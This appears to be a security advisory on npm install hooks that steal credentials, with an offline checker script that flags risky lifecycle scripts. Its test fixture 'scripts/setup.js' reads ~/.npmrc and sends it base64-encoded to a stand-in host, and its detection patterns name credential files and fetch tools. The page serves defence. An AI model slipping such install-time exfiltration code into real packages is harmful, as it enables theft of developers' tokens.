npm postinstall | high severity

npm Postinstall Credential Stealer

A package install hook runs before the app starts, giving malicious code a chance to read local files, tokens, or browser data.

How the pattern works

The attacker does not wait for npm run dev. They use package lifecycle scripts so code runs during dependency installation. That matters because many developers treat npm install as setup, not as executing someone else's program.

A malicious hook can collect local files, inspect environment variables, read browser profile paths, or download a second-stage script before the app ever opens.

Why it is effective

Install hooks blend into normal JavaScript workflows. Some legitimate projects use them for native builds or setup tasks, so the presence of a hook is not automatically malicious.

The signal becomes serious when the hook launches custom scripts, reaches out to the network, or touches files unrelated to dependency setup.

What to check

Before installing an unknown repo, read package.json and inspect every lifecycle script. Follow any local script it calls.

If you see install-time network calls, shell commands, obfuscated JavaScript, or credential-related file paths, stop and review in an isolated environment.
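The checks above, carried out as an added example (not code from the original page): a small offline Node script that reads package.json, lists the lifecycle hooks npm runs at install time, follows any local script file a hook invokes, and flags the review triggers named above (network calls, shell commands, obfuscated JavaScript, credential-related paths, environment inspection). The two repos it scans are constructed in-memory maps of path to contents, so nothing is read from disk or the network; the hook names are the real npm lifecycle hooks, while the indicator patterns, fixture contents and the `collector.invalid` host are illustrative assumptions.

```javascript
// Added example, not code from the original page: an offline lifecycle-script
// checker for a repo you are about to install. The repos below are constructed
// in-memory maps (path -> contents); swap readerFor for a reader backed by
// fs.readFileSync to run it on a real checkout.

// Hooks that execute during dependency installation, before the app starts.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Review triggers from the page, as [category, regex]. Illustrative, not exhaustive.
const INDICATORS = [
  ["network", /\b(curl|wget)\b|\bfetch\s*\(|\brequire\s*\(\s*['"](https?|net|dns)['"]\s*\)|https?:\/\//i],
  ["shell", /\bchild_process\b|\b(exec|execSync|spawn|spawnSync)\s*\(|\b(sh|bash)\s+-c\b|\bpowershell\b/i],
  ["obfuscation", /\beval\s*\(|\bnew\s+Function\s*\(|\bString\.fromCharCode\b|\batob\s*\(|['"]base64['"]|(\\x[0-9a-f]{2}){6,}/i],
  ["credentials", /\.npmrc|\.netrc|\.git-credentials|\.ssh\b|id_rsa|\.aws\b|\.kube\b|\.docker\/config\.json|Login Data|Local Storage|keychain/i],
  ["environment", /\bprocess\.env\b/],
];

// Constructed fixture: hooks that only build a native addon and install git hooks,
// the legitimate use the page mentions. Expected: no findings.
const BENIGN_REPO = {
  "package.json": JSON.stringify({
    name: "demo-native",
    scripts: { postinstall: "node-gyp rebuild", prepare: "husky", test: "jest" },
  }),
};

// Constructed fixture: the hook line itself looks harmless, so the checker has to
// follow the local script it calls to see the credential read and the network send.
const SUSPICIOUS_REPO = {
  "package.json": JSON.stringify({
    name: "demo-app",
    scripts: { postinstall: "node scripts/setup.js", dev: "vite" },
  }),
  "scripts/setup.js": [
    "// constructed fixture: the kind of install-time script the page warns about",
    "const fs = require('fs'), os = require('os');",
    "const rc = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');",
    "const payload = Buffer.from(rc).toString('base64');",
    "require('https').request({ host: 'collector.invalid', method: 'POST' }).end(payload);",
  ].join("\n"),
};

// Reader over an in-memory repo; returns null for paths that do not exist.
function readerFor(repo) {
  return (path) => (Object.prototype.hasOwnProperty.call(repo, path) ? repo[path] : null);
}

// Local script files a hook command invokes (e.g. "node scripts/setup.js", "sh ./x.sh").
function referencedFiles(command, readFile) {
  const files = [];
  for (const token of command.split(/\s+/)) {
    const p = token.replace(/^\.\//, "");
    if (/\.[cm]?js$|\.sh$|\.ps1$/i.test(p) && readFile(p) !== null) files.push(p);
  }
  return files;
}

// Run every indicator over one piece of text and record where it matched.
function scanText(text, where) {
  const findings = [];
  for (const [category, re] of INDICATORS) {
    const m = text.match(re);
    if (m) findings.push({ category, where, match: m[0] });
  }
  return findings;
}

// Inspect every install-time hook in package.json plus the local scripts it calls.
function checkPackage(readFile) {
  const pkg = JSON.parse(readFile("package.json"));
  const scripts = pkg.scripts || {};
  const report = [];
  for (const hook of INSTALL_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const command = scripts[hook];
    const files = referencedFiles(command, readFile);
    const findings = scanText(command, "scripts." + hook);
    for (const f of files) findings.push(...scanText(readFile(f), f));
    report.push({ hook, command, files, findings });
  }
  return report;
}

// The page's decision rule: any hook with findings means stop and review in isolation.
function verdict(report) {
  const flagged = report.filter((r) => r.findings.length > 0).map((r) => r.hook);
  return { hooks: report.length, flagged, stop: flagged.length > 0 };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, repo] of [["benign", BENIGN_REPO], ["suspicious", SUSPICIOUS_REPO]]) {
    const report = checkPackage(readerFor(repo));
    console.log(label, JSON.stringify(verdict(report)), JSON.stringify(report, null, 2));
  }
}
```

On the benign fixture the checker enumerates two install-time hooks and reports nothing; on the suspicious one the hook command itself is clean, and only following `scripts/setup.js` surfaces the `.npmrc` read, the base64 encoding and the outbound request, which is why the page tells you to follow every local script a hook calls rather than judging the one-line command. Pattern matching of this kind is a triage aid, not proof either way: a hook that passes it still deserves a read, and running `npm install --ignore-scripts` (or setting `ignore-scripts` in your npm config) keeps lifecycle scripts from executing at all while you review.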